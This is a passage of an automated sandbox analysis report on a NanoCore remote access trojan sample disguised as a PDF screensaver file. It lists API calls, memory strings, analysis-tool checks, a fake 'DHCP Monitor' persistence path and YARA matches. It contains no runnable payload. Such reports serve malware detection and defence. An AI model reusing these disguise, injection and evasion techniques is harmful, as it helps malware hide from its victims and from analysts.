      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdevicecapsw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: selectobject
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: stretchblt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createdibsection
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00371A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_00371A91
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00313312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,2_2_00313312
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037EBB3 mouse_event,2_2_0037EBB3
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00371EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_00371EF3
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003713F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_003713F2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007382000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003872000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerH
      Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager&
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.586667731.00000000075DC000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
      Source: itugx.exe Binary or memory string: Shell_TrayWnd
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager8W
      Source: itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerm,
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managera
      Source: itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then
      Source: itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: inGetText("Program Manager") = "0" Then
      Source: rnnsh.xls.0.dr Binary or memory string: If WinGetText("Program Manager") = "0" Then
      Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager\2
      Source: itugx.exe, 00000017.00000003.535781769.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534401259.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.539266088.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager*;
      Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then$
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003802000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerD$Fp
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00CDAF0F
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDF654 cpuid 0_2_00CDF654
      Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_00CDDF1E
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0034BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 2_2_0034BCF2
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0036E5F8 GetUserNameW, 2_2_0036E5F8
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CCB146 GetVersionExW, 0_2_00CCB146
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exe

      Stealing of Sensitive Information

      Source: Yara match File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
      Source: itugx.exe Binary or memory string: WIN_81
      Source: itugx.exe Binary or memory string: WIN_XP
      Source: itugx.exe Binary or memory string: WIN_XPe
      Source: itugx.exe Binary or memory string: WIN_VISTA
      Source: itugx.exe Binary or memory string: WIN_7
      Source: itugx.exe Binary or memory string: WIN_8

      Remote Access Functionality

      Source: itugx.exe, 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordA
ttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssem
blyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordA
ttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplica